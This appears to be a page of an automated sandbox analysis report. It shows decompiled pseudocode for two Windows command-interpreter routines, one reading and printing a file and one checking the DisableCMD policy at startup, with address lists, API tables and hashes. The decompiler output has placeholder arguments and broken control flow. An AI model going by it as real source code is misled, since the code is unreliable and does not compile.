                                  			E001765A0(WCHAR* __edx, WCHAR* _a4, long _a8, WCHAR* _a12, long _a16, signed int _a20, int _a24, short* _a28, void* _a32, signed int _a36, signed int _a40, WCHAR* _a44, WCHAR* _a48, void* _a52, long _a56, char _a60, intOrPtr _a68, void _a72, void* _a592, char _a596, long _a600, void _a608, void _a610, short _a1128, signed int _a4204) {
				void* _v0;
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				WCHAR* _t150;
				void* _t155;
				long _t157;
				WCHAR* _t160;
				signed int _t161;
				WCHAR* _t164;
				void* _t172;
				long _t174;
				WCHAR* _t175;
				signed int _t176;
				WCHAR* _t178;
				long _t181;
				WCHAR* _t182;
				WCHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				long _t192;
				WCHAR* _t195;
				int _t197;
				void* _t198;
				WCHAR* _t199;
				void* _t202;
				WCHAR* _t206;
				long _t208;
				void* _t212;
				void* _t213;
				void* _t222;
				unsigned int _t226;
				WCHAR* _t228;
				void* _t232;
				unsigned int _t234;
				void* _t235;
				long _t245;
				int _t246;
				WCHAR* _t251;
				WCHAR* _t252;
				signed char* _t254;
				intOrPtr _t257;
				WCHAR* _t258;
				union _LARGE_INTEGER _t263;
				void* _t264;
				void* _t266;
				void* _t267;
				int _t268;
				WCHAR* _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;

				_t253 = __edx;
				_t274 = _t273 & 0xfffffff8;
				E00168290(0x1074);
				_t137 =  *0x17d0b4; // 0x3dd0c51d
				_a4204 = _t137 ^ _t274;
				_a56 = _a56 | 0xffffffff;
				_t262 = _a4;
				_a600 = 0x104;
				_a48 = _a4;
				_t266 = 0;
				_a52 = 0;
				_t212 = 1;
				_a20 = 0;
				_a60 = 0x7fffffff;
				_a32 = 0;
				_a36 = 0;
				_a40 = 1;
				_a592 = 0;
				_a596 = 1;
				memset( &_a72, 0, 0x104);
				_t275 = _t274 + 0xc;
				if(E00160C70( &_a72, ((0 | _a596 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t253 = 0;
					_t263 = E0015D120(_t262, 0,  &_a72);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						L13:
						_a28 =  &_a608;
						_t150 = E00160178( &_a608);
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 =  &_a60;
							__imp___get_osfhandle(_t202);
							_a56 = GetFileSize(_t202, _t263);
							__imp___get_osfhandle(0);
							SetFilePointer(0, _t263, 0, 0);
							_t30 =  &_a36;
							 *_t30 = _a36 & _t266;
							__eflags =  *_t30;
							_a32 = _t212;
						}
						while(1) {
							L15:
							__eflags =  *0x17d544;
							if( *0x17d544 != 0) {
								break;
							}
							_t155 =  &_a608;
							__imp___get_osfhandle(_t155, 0x200,  &_a4, 0);
							_t222 = _t263;
							_t156 = ReadFile(_t155, ??, ??, ??, ??);
							__eflags = _t156;
							if(_t156 == 0) {
								L81:
								_t157 = GetLastError();
								_push(0);
								_push(_t157);
								 *0x193cf0 = _t157;
								E0015C5A2(_t222);
								L82:
								E0015DB92(_t263);
								_t212 = 0;
								goto L87;
							}
							_t226 = _a4;
							__eflags = _t226;
							if(_t226 == 0) {
								goto L82;
							}
							__eflags = _a40;
							if(_a40 == 0) {
								L21:
								_a24 = _t226;
								__eflags = _t266;
								if(_t266 == 0) {
									L25:
									_t160 = E0016269C(_t156);
									__eflags = _t160;
									if(_t160 != 0) {
										L28:
										_t268 = _a4;
										_t254 =  &_a608;
										_t228 = _t268;
										__eflags = _t268;
										while(1) {
											_a12 = _t228;
											if(__eflags == 0) {
												break;
											}
											_t161 =  *_t254 & 0x000000ff;
											__eflags =  *((char*)(_t161 + 0x197f30));
											if( *((char*)(_t161 + 0x197f30)) == 0) {
												L31:
												_t254 =  &(_t254[1]);
												_t228 = _t228 - 1;
												__eflags = _t228;
												continue;
											}
											_t253 =  &(_t254[1]);
											_t228 = _t228 - 1;
											__eflags = _t228;
											_a12 = _t228;
											if(_t228 == 0) {
												_t198 =  &_a12;
												__imp___get_osfhandle(_t253, _t212, _t198, 0);
												_t222 = _t263;
												_t199 = ReadFile(_t198, ??, ??, ??, ??);
												__eflags = _t199;
												if(_t199 == 0) {
													goto L81;
												}
												_t268 =  &(_a4[0]);
												__eflags = _t268;
												_a4 = _t268;
												_a24 = _t268;
												L36:
												_a28 = _a28 & 0x00000000;
												_t253 =  &_a608;
												_t164 = E00176CEF(_t212,  &_a608,  &_a24,  &_a28);
												__eflags = _t164;
												if(_t164 != 0) {
													L39:
													_t269 = MultiByteToWideChar( *0x183854, 0,  &_a608, _t268,  &_a1128, 0x400);
													_a12 = _t269;
													__eflags = _t269;
													if(_t269 == 0) {
														_t269 = 0x400;
														_a12 = 0x400;
													}
													_t226 = _a4;
													_a28 =  &_a1128;
													L42:
													__eflags = _a40;
													if(_a40 != 0) {
														__eflags =  *0x193cd0;
														if( *0x193cd0 != 0) {
															E0015C5A2(_t226, 0x2354, _t212, _a48);
															_t226 = _a4;
															_t275 = _t275 + 0xc;
															_t269 = _a12;
														}
														_t75 =  &_a40;
														 *_t75 = _a40 & 0x00000000;
														__eflags =  *_t75;
													}
													_v0 = _a28;
													__eflags = _t269;
													if(_t269 <= 0) {
														L74:
														_t270 = _a32;
														_t253 = _a36;
														__eflags = _t270 | _t253;
														if((_t270 | _t253) != 0) {
															_t172 =  &_a32;
															__imp___get_osfhandle(_t172, _t212);
															SetFilePointerEx(_t172, _t263, 0, 0);
															_t253 = _a36;
															_t270 = _a32;
															_t226 = _a4;
														}
														__eflags = _t226 - _a24;
														if(_t226 != _a24) {
															goto L82;
														} else {
															__eflags = _a60 - _t253;
															if(__eflags < 0) {
																goto L82;
															}
															if(__eflags > 0) {
																L80:
																_t266 = _a20;
																goto L15;
															}
															__eflags = _a56 - _t270;
															if(_a56 <= _t270) {
																goto L82;
															}
															goto L80;
														}
													} else {
														do {
															_t174 = 0x50;
															__eflags = _t269 - _t174;
															if(_t269 <= _t174) {
																_a8 = _t269;
																__eflags = _t269;
																if(_t269 == 0) {
																	break;
																}
																L50:
																__eflags =  *0x17d544;
																if( *0x17d544 != 0) {
																	goto L86;
																}
																_t175 = E0016269C(_t174);
																__eflags = _t175;
																if(_t175 == 0) {
																	__eflags =  *0x19805c;
																	if( *0x19805c != 0) {
																		__eflags = _a20;
																		if(_a20 == 0) {
																			_t176 = _a8;
																			_t232 = _v0;
																			L62:
																			_a68 = _t176 + _t176;
																			_t178 = E001627C8(_t176 + _t176, _t232, _t176 + _t176,  &_a16);
																			__eflags = _a12;
																			_t257 = _v8;
																			_a36 = _t178;
																			if(_a12 != 0) {
																				 *((short*)(_a68 + _t257)) = _a52;
																			}
																			_t234 = _a16;
																			_t269 = _t269 - (_t234 >> 1);
																			_t181 = _a8;
																			_t258 = _t257 + _t234;
																			__eflags = _t258;
																			_v0 = _t258;
																			L65:
																			_t253 = _a44;
																			L66:
																			__eflags = _t253;
																			if(_t253 == 0) {
																				L68:
																				_t182 = GetLastError();
																				 *0x193cf0 = _t182;
																				__eflags = _t182;
																				if(_t182 == 0) {
																					 *0x193cf0 = 0x70;
																				}
																				_t235 = _t212;
																				_t183 = E00160178(_t182);
																				__eflags = _t183;
																				if(_t183 == 0) {
																					_t236 = _t212;
																					_t184 = E00179953(_t183, _t212);
																					__eflags = _t184;
																					if(_t184 == 0) {
																						E0017985A( *0x193cf0);
																					} else {
																						_push(0);
																						_push(0x2364);
																						E0015C5A2(_t236);
																					}
																					goto L86;
																				} else {
																					_push(0);
																					_push(0x1d);
																					E0015C5A2(_t235);
																					goto L72;
																				}
																			}
																			__eflags = _t234 - _t181 + _t181;
																			if(_t234 == _t181 + _t181) {
																				goto L72;
																			}
																			goto L68;
																		}
																		L60:
																		_t176 = _a8;
																		_t232 = _v0;
																		_a52 =  *(_t232 + _t176 * 2) & 0x0000ffff;
																		 *(_t232 + _t176 * 2) = 0;
																		goto L62;
																	}
																	__eflags = _a20;
																	if(_a20 != 0) {
																		goto L60;
																	}
																	_t190 = _a8;
																	L58:
																	__imp___get_osfhandle(0);
																	_t253 = WriteFile(_t190, _t212, _v0, _t190,  &_a16);
																	_t192 = _a16;
																	_t269 = _t269 - _t192;
																	_v0 = _v0 + _t192;
																	_t234 = _t192 + _t192;
																	_t181 = _a8;
																	_a16 = _t234;
																	goto L66;
																}
																_t195 = WriteConsoleW(GetStdHandle(0xfffffff5), _v0, _a8,  &_a16, 0);
																_a44 = _t195;
																__eflags = _t195;
																_t190 = _a8;
																if(_t195 == 0) {
																	goto L58;
																}
																_t245 = _a16;
																__eflags = _t245 - _t190;
																if(_t245 != _t190) {
																	goto L58;
																}
																_t269 = _t269 - _t245;
																_t234 = _t245 + _t245;
																_v0 = _v0 + _t234;
																_a16 = _t234;
																goto L65;
															}
															_a8 = _t174;
															goto L50;
															L72:
															__eflags = _t269;
														} while (_t269 > 0);
														_t226 = _a4;
														goto L74;
													}
												}
												_t197 = _a24;
												__eflags = _t197;
												if(_t197 == 0) {
													goto L82;
												}
												_t268 = _t197;
												goto L39;
											}
											goto L31;
										}
										goto L36;
									}
									__eflags =  *0x19805c - _t160;
									if( *0x19805c != _t160) {
										goto L28;
									}
									_t226 = _a4;
									_t269 = _t226;
									L23:
									_a12 = _t269;
									goto L42;
								}
								_t269 = _t226 >> 1;
								__eflags = _t269;
								goto L23;
							}
							_t156 = 0xfeff;
							__eflags = _a608 - 0xfeff;
							if(_a608 != 0xfeff) {
								_t45 =  &_a20;
								 *_t45 = _a20 & 0x00000000;
								__eflags =  *_t45;
								_a24 = _t226;
								goto L25;
							}
							_t246 = _t226 - 2;
							__eflags = _t246;
							_a4 = _t246;
							_t266 = _t212;
							_a20 = _t266;
							_t156 = memmove( &_a608,  &_a610, _t246);
							_t226 = _a4;
							_t275 = _t275 + 0xc;
							goto L21;
						}
						L86:
						E0015DB92(_t263);
						goto L87;
					}
					_t206 = E00163320(L"DPATH");
					__eflags = _t206;
					if(_t206 == 0) {
						L11:
						_t250 =  *0x193cf0;
						__eflags =  *0x193cf0 - 0x7b;
						if( *0x193cf0 == 0x7b) {
							_t250 = 2;
							 *0x193cf0 = _t250;
						}
						goto L2;
					}
					_t251 = _a592;
					__eflags = _t251;
					if(_t251 == 0) {
						_t251 =  &_a72;
					}
					_t208 = SearchPathW(_t206, _a48, 0, _a600, _t251, 0);
					__eflags = _t208;
					if(_t208 == 0) {
						goto L11;
					}
					_t252 = _a592;
					__eflags = _t252;
					if(_t252 == 0) {
						_t252 =  &_a72;
					}
					_t253 = 0;
					_t263 = E0015D120(_t252, 0, _t252);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t250 = 8;
					L2:
					E0017985A(_t250);
					L87:
					__imp__??_V@YAXPAX@Z(_a592);
					_pop(_t264);
					_pop(_t267);
					_pop(_t213);
					return E00166FD0(_t212, _t213, _a4204 ^ _t275, _t253, _t264, _t267);
				}
			}


























































                                  0x001765a0
                                  0x001765a5
                                  0x001765ad
                                  0x001765b2
                                  0x001765b9
                                  0x001765c0
                                  0x001765ca
                                  0x001765d3
                                  0x001765e1
                                  0x001765e5
                                  0x001765e7
                                  0x001765eb
                                  0x001765ec
                                  0x001765f1
                                  0x001765f9
                                  0x001765fd
                                  0x00176601
                                  0x00176605
                                  0x0017660c
                                  0x00176613
                                  0x0017661e
                                  0x0017663e
                                  0x0017664e
                                  0x00176657
                                  0x00176659
                                  0x0017665c
                                  0x001766cd
                                  0x001766d6
                                  0x001766da
                                  0x001766df
                                  0x001766e1
                                  0x001766e3
                                  0x001766e9
                                  0x001766f7
                                  0x00176701
                                  0x00176709
                                  0x0017670f
                                  0x0017670f
                                  0x0017670f
                                  0x00176713
                                  0x00176713
                                  0x00176717
                                  0x00176717
                                  0x00176717
                                  0x0017671e
                                  0x00000000
                                  0x00000000
                                  0x00176730
                                  0x00176739
                                  0x0017673f
                                  0x00176741
                                  0x00176747
                                  0x00176749
                                  0x00176aad
                                  0x00176aad
                                  0x00176ab3
                                  0x00176ab5
                                  0x00176ab6
                                  0x00176abb
                                  0x00176ac2
                                  0x00176ac4
                                  0x00176ac9
                                  0x00000000
                                  0x00176ac9
                                  0x0017674f
                                  0x00176753
                                  0x00176755
                                  0x00000000
                                  0x00000000
                                  0x0017675b
                                  0x00176760
                                  0x0017679c
                                  0x0017679c
                                  0x001767a0
                                  0x001767a2
                                  0x001767ba
                                  0x001767bc
                                  0x001767c1
                                  0x001767c3
                                  0x001767d5
                                  0x001767d5
                                  0x001767d9
                                  0x001767e0
                                  0x001767e2
                                  0x00176800
                                  0x00176800
                                  0x00176804
                                  0x00000000
                                  0x00000000
                                  0x001767e6
                                  0x001767e9
                                  0x001767f0
                                  0x001767fc
                                  0x001767fc
                                  0x001767fd
                                  0x001767fd
                                  0x00000000
                                  0x001767fd
                                  0x001767f2
                                  0x001767f3
                                  0x001767f3
                                  0x001767f6
                                  0x001767fa
                                  0x0017680a
                                  0x00176812
                                  0x00176818
                                  0x0017681a
                                  0x00176820
                                  0x00176822
                                  0x00000000
                                  0x00000000
                                  0x0017682c
                                  0x0017682c
                                  0x0017682d
                                  0x00176831
                                  0x00176835
                                  0x00176835
                                  0x00176846
                                  0x0017684d
                                  0x00176852
                                  0x00176854
                                  0x00176864
                                  0x00176888
                                  0x0017688a
                                  0x0017688e
                                  0x00176890
                                  0x00176892
                                  0x00176897
                                  0x00176897
                                  0x0017689b
                                  0x001768a6
                                  0x001768aa
                                  0x001768aa
                                  0x001768af
                                  0x001768b1
                                  0x001768b8
                                  0x001768c4
                                  0x001768c9
                                  0x001768cd
                                  0x001768d0
                                  0x001768d0
                                  0x001768d4
                                  0x001768d4
                                  0x001768d4
                                  0x001768d4
                                  0x001768dd
                                  0x001768e1
                                  0x001768e3
                                  0x00176a5d
                                  0x00176a5d
                                  0x00176a63
                                  0x00176a67
                                  0x00176a69
                                  0x00176a6c
                                  0x00176a76
                                  0x00176a7e
                                  0x00176a84
                                  0x00176a88
                                  0x00176a8c
                                  0x00176a8c
                                  0x00176a90
                                  0x00176a94
                                  0x00000000
                                  0x00176a96
                                  0x00176a96
                                  0x00176a9a
                                  0x00000000
                                  0x00000000
                                  0x00176a9c
                                  0x00176aa4
                                  0x00176aa4
                                  0x00000000
                                  0x00176aa4
                                  0x00176a9e
                                  0x00176aa2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00176aa2
                                  0x001768e9
                                  0x001768e9
                                  0x001768eb
                                  0x001768ec
                                  0x001768ee
                                  0x001768f6
                                  0x001768fa
                                  0x001768fc
                                  0x00000000
                                  0x00000000
                                  0x00176902
                                  0x00176902
                                  0x00176909
                                  0x00000000
                                  0x00000000
                                  0x00176911
                                  0x00176916
                                  0x00176918
                                  0x0017695d
                                  0x00176964
                                  0x001769a5
                                  0x001769aa
                                  0x001769c4
                                  0x001769c8
                                  0x001769cc
                                  0x001769d5
                                  0x001769dc
                                  0x001769e1
                                  0x001769e6
                                  0x001769ea
                                  0x001769ee
                                  0x001769f8
                                  0x001769f8
                                  0x001769fc
                                  0x00176a04
                                  0x00176a06
                                  0x00176a0a
                                  0x00176a0a
                                  0x00176a0c
                                  0x00176a10
                                  0x00176a10
                                  0x00176a14
                                  0x00176a14
                                  0x00176a16
                                  0x00176a1e
                                  0x00176a1e
                                  0x00176a24
                                  0x00176a29
                                  0x00176a2b
                                  0x00176a2d
                                  0x00176a2d
                                  0x00176a37
                                  0x00176a39
                                  0x00176a3e
                                  0x00176a40
                                  0x00176acd
                                  0x00176acf
                                  0x00176ad4
                                  0x00176ad6
                                  0x00176aee
                                  0x00176ad8
                                  0x00176ad8
                                  0x00176ada
                                  0x00176adf
                                  0x00176ae5
                                  0x00000000
                                  0x00176a46
                                  0x00176a46
                                  0x00176a48
                                  0x00176a4a
                                  0x00000000
                                  0x00176a50
                                  0x00176a40
                                  0x00176a1a
                                  0x00176a1c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00176a1c
                                  0x001769ac
                                  0x001769ac
                                  0x001769b0
                                  0x001769b8
                                  0x001769be
                                  0x00000000
                                  0x001769be
                                  0x00176966
                                  0x0017696b
                                  0x00000000
                                  0x00000000
                                  0x0017696d
                                  0x00176971
                                  0x0017697e
                                  0x0017698c
                                  0x0017698e
                                  0x00176992
                                  0x00176994
                                  0x00176998
                                  0x0017699b
                                  0x0017699f
                                  0x00000000
                                  0x0017699f
                                  0x00176932
                                  0x00176938
                                  0x0017693c
                                  0x0017693e
                                  0x00176942
                                  0x00000000
                                  0x00000000
                                  0x00176944
                                  0x00176948
                                  0x0017694a
                                  0x00000000
                                  0x00000000
                                  0x0017694c
                                  0x0017694e
                                  0x00176950
                                  0x00176954
                                  0x00000000
                                  0x00176954
                                  0x001768f0
                                  0x00000000
                                  0x00176a51
                                  0x00176a51
                                  0x00176a51
                                  0x00176a59
                                  0x00000000
                                  0x00176a59
                                  0x001768e3
                                  0x00176856
                                  0x0017685a
                                  0x0017685c
                                  0x00000000
                                  0x00000000
                                  0x00176862
                                  0x00000000
                                  0x00176862
                                  0x00000000
                                  0x001767fa
                                  0x00000000
                                  0x00176806
                                  0x001767c5
                                  0x001767cb
                                  0x00000000
                                  0x00000000
                                  0x001767cd
                                  0x001767d1
                                  0x001767a8
                                  0x001767a8
                                  0x00000000
                                  0x001767a8
                                  0x001767a6
                                  0x001767a6
                                  0x00000000
                                  0x001767a6
                                  0x00176762
                                  0x00176767
                                  0x0017676f
                                  0x001767b1
                                  0x001767b1
                                  0x001767b1
                                  0x001767b6
                                  0x00000000
                                  0x001767b6
                                  0x00176771
                                  0x00176771
                                  0x00176784
                                  0x00176788
                                  0x0017678b
                                  0x0017678f
                                  0x00176795
                                  0x00176799
                                  0x00000000
                                  0x00176799
                                  0x00176af3
                                  0x00176af5
                                  0x00000000
                                  0x00176af5
                                  0x00176663
                                  0x00176668
                                  0x0017666a
                                  0x001766b4
                                  0x001766b4
                                  0x001766ba
                                  0x001766bd
                                  0x001766c1
                                  0x001766c2
                                  0x001766c2
                                  0x00000000
                                  0x001766bd
                                  0x0017666c
                                  0x00176673
                                  0x00176675
                                  0x00176677
                                  0x00176677
                                  0x0017668c
                                  0x00176692
                                  0x00176694
                                  0x00000000
                                  0x00000000
                                  0x00176696
                                  0x0017669d
                                  0x0017669f
                                  0x001766a1
                                  0x001766a1
                                  0x001766a6
                                  0x001766ad
                                  0x001766af
                                  0x001766b2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00176640
                                  0x00176642
                                  0x00176643
                                  0x00176643
                                  0x00176afa
                                  0x00176b01
                                  0x00176b11
                                  0x00176b12
                                  0x00176b13
                                  0x00176b1e
                                  0x00176b1e

                                  APIs
                                  • memset.MSVCRT ref: 00176613
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 0017668C
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00176B01
                                    • Part of subcall function 00160178: _get_osfhandle.MSVCRT ref: 00160183
                                    • Part of subcall function 00160178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0016D6A1), ref: 0016018D
                                  • _get_osfhandle.MSVCRT ref: 001766E9
                                  • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 001766F1
                                  • _get_osfhandle.MSVCRT ref: 00176701
                                  • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00176709
                                    • Part of subcall function 0016269C: _get_osfhandle.MSVCRT ref: 001626A7
                                    • Part of subcall function 0016269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0015C5F8,?,?,?), ref: 001626B6
                                    • Part of subcall function 0016269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626D2
                                    • Part of subcall function 0016269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,00000002), ref: 001626E1
                                    • Part of subcall function 0016269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001626EC
                                    • Part of subcall function 0016269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0015C5C6), ref: 001626F5
                                  • _get_osfhandle.MSVCRT ref: 00176739
                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 00176741
                                  • memmove.MSVCRT ref: 0017678F
                                  • _get_osfhandle.MSVCRT ref: 00176812
                                  • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0017681A
                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 00176882
                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 0017692B
                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00176932
                                  • _get_osfhandle.MSVCRT ref: 0017697E
                                  • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00176986
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 00176A1E
                                  • _get_osfhandle.MSVCRT ref: 00176A76
                                  • SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00176A7E
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00176AAD
                                    • Part of subcall function 00179953: _get_osfhandle.MSVCRT ref: 00179956
                                    • Part of subcall function 00179953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0017995E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
                                  • String ID: DPATH
                                  • API String ID: 1247154890-2010427443
                                  • Opcode ID: 0ac4b6bdc31637e1d2c844effe320b31b6f8379c15f855544167c80b4bdf0f5c
                                  • Instruction ID: dd2aaa92d87c3d7c1cf6aa22d1a274f9f64070b8f3be899546aa2a5601a8cbf2
                                  • Opcode Fuzzy Hash: 0ac4b6bdc31637e1d2c844effe320b31b6f8379c15f855544167c80b4bdf0f5c
                                  • Instruction Fuzzy Hash: B8F19E71A08741DFDB28DF24C844B6BB7F8BB88714F14892EF99997290EB70D944CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001644FC, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 69%
                                  			E001644FC() {
				signed int _v8;
				char _v24;
				int* _v28;
				char _v29;
				char _v36;
				void* _v40;
				int* _v44;
				int _v48;
				int _v52;
				signed int _t26;
				void* _t39;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t51;
				int _t53;
				intOrPtr _t55;
				int _t59;
				int _t64;
				void* _t73;
				void* _t75;
				intOrPtr _t82;
				void* _t84;
				void* _t95;
				char* _t96;
				signed int _t97;
				signed int _t98;

				_t26 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t26 ^ _t98;
				_v44 = 0;
				 *0x18b938 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				E0016465D(_t75);
				__imp__HeapSetInformation(0, 1, 0, 0, _t95, _t97, _t73);
				_v36 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_v40) == 0) {
					_v48 = 4;
					RegQueryValueExW(_v40, L"DisableCMD", 0,  &_v52,  &_v36,  &_v48);
					RegCloseKey(_v40);
				}
				 *0x17d614 = 1;
				_t93 = 0x17d600;
				 *0x17d610 =  &_v29;
				_t39 = E00164719(0x17d600);
				asm("sbb al, al");
				 *0x17d614 =  *0x17d614 &  ~(_t39 - 1);
				E001646D8();
				_v28 = 0;
				_t96 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t44 = E00163D27(0,  &_v24);
				if(_v36 == 1) {
					_push(0);
					_push(0x40002729);
					E0015C108( &_v24);
					E00173BB0(__eflags, 0);
					do {
						__eflags = E00164B60(__eflags, 0);
					} while (__eflags == 0);
					_push(0xff);
					goto L13;
				} else {
					_t96 = 0xff;
					if(_t44 == 0) {
						L29:
						_push(0);
						L001682C1();
						_v28 = _t44;
						_t84 = 0x18b8b8;
						_t97 = 2;
						__eflags = _t44;
						if(_t44 == 0) {
							L33:
							__eflags = _v36 - _t97;
							if(_v36 != _t97) {
								_t55 = E00160178(_t44);
								__eflags = _t55;
								if(_t55 == 0) {
									_t97 = 3;
									__imp___setmode(0x8000);
									0 = 0;
								}
								E0015B2B0(0, 0);
								while(1) {
									L40:
									 *0x17d590 = 0;
									EnterCriticalSection( *0x183858);
									 *0x17d544 = 0;
									LeaveCriticalSection( *0x183858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E0015EEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										continue;
									}
									L41:
									__eflags = _t96 - 0xffffffff;
									if(__eflags == 0) {
										do {
											__eflags = E00164B60(__eflags, 0);
										} while (__eflags == 0);
										L25:
										_push(0);
										L13:
										exit();
										L14:
										_t48 = E0015EEF0(1, _t93,  *0x193cd8);
										if(_t48 == 1) {
											do {
												__eflags = E00164B60(__eflags, 0);
											} while (__eflags == 0);
											_push(1);
											goto L13;
										}
										if(_t48 == 0xffffffff) {
											do {
												__eflags = E00164B60(__eflags, 0);
											} while (__eflags == 0);
											goto L25;
										}
										_t93 = _t48;
										_t51 = E00160E00(0, _t48);
										if(_t51 != 0) {
											_v28 = _t51;
										}
										L8:
										_t97 = _t97 + 1;
										if(_t97 < 3) {
											L7:
											_t93 =  *((intOrPtr*)(_t98 + _t97 * 4 - 0x14));
											if( *((intOrPtr*)(_t98 + _t97 * 4 - 0x14)) != 0) {
												goto L14;
											}
											goto L8;
										}
										E001606C0(0);
										_t53 = GetConsoleOutputCP();
										 *0x183854 = _t53;
										GetCPInfo(_t53, 0x183840);
										_t44 = E0016465D(0);
										_t82 =  *0x193ccc;
										L10:
										_t106 = _t82;
										if(_t82 == 0) {
											 *0x198058 = 0;
											goto L29;
										} else {
											goto L11;
										}
										do {
											L11:
										} while (E00164B60(_t106, 0) == 0);
										_push(_v28);
										goto L13;
									}
									EnterCriticalSection( *0x183858);
									 *0x17d544 = 0;
									LeaveCriticalSection( *0x183858);
									_t59 = GetConsoleOutputCP();
									 *0x183854 = _t59;
									GetCPInfo(_t59, 0x183840);
									E0016465D(_t86);
									E00160E00(0, _t96);
									 *0x17d59c = 0;
									E001606C0(0);
									_t64 = GetConsoleOutputCP();
									 *0x183854 = _t64;
									GetCPInfo(_t64, 0x183840);
									E0016465D(0);
									do {
										goto L40;
									} while (_t96 == 1);
									goto L41;
									L40:
									 *0x17d590 = 0;
									EnterCriticalSection( *0x183858);
									 *0x17d544 = 0;
									LeaveCriticalSection( *0x183858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E0015EEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
								}
							}
							_push(0);
							_push(0x40002729);
							E0015C108(_t84);
							E00173BB0(__eflags, 0);
							do {
								__eflags = E00164B60(__eflags, 0);
							} while (__eflags == 0);
							_push(_t96);
							goto L13;
						}
						__eflags = _t44 - _t97;
						if(__eflags != 0) {
							goto L33;
						} else {
							goto L31;
						}
						do {
							L31:
							__eflags = E00164B60(__eflags, 0);
						} while (__eflags == 0);
						goto L25;
					}
					_push(0);
					_push(0x18b8b8);
					L001682C1();
					_t82 =  *0x193ccc;
					if(_t44 != 0) {
						_t44 = 1;
						_v44 = 1;
						__eflags = _t82;
						if(__eflags != 0) {
							_v28 = 0xff;
						}
					} else {
						_t44 = _v44;
					}
					if(_t44 != 0) {
						goto L10;
					} else {
						_t97 = 0;
						goto L7;
					}
				}
			}





























                                  0x00164504
                                  0x0016450b
                                  0x00164513
                                  0x00164529
                                  0x0016452e
                                  0x00164538
                                  0x00164541
                                  0x0016455d
                                  0x0016e6ee
                                  0x0016e707
                                  0x0016e710
                                  0x0016e710
                                  0x00164566
                                  0x0016456d
                                  0x00164572
                                  0x00164577
                                  0x0016457f
                                  0x00164581
                                  0x00164587
                                  0x0016458e
                                  0x00164591
                                  0x00164594
                                  0x00164598
                                  0x00164599
                                  0x0016459a
                                  0x0016459b
                                  0x001645a4
                                  0x0016e71b
                                  0x0016e71c
                                  0x0016e721
                                  0x0016e729
                                  0x0016e72e
                                  0x0016e734
                                  0x0016e734
                                  0x0016e738
                                  0x00000000
                                  0x001645aa
                                  0x001645aa
                                  0x001645b1
                                  0x0016e77f
                                  0x0016e77f
                                  0x0016e785
                                  0x0016e78a
                                  0x0016e78e
                                  0x0016e791
                                  0x0016e792
                                  0x0016e794
                                  0x0016e7a6
                                  0x0016e7a6
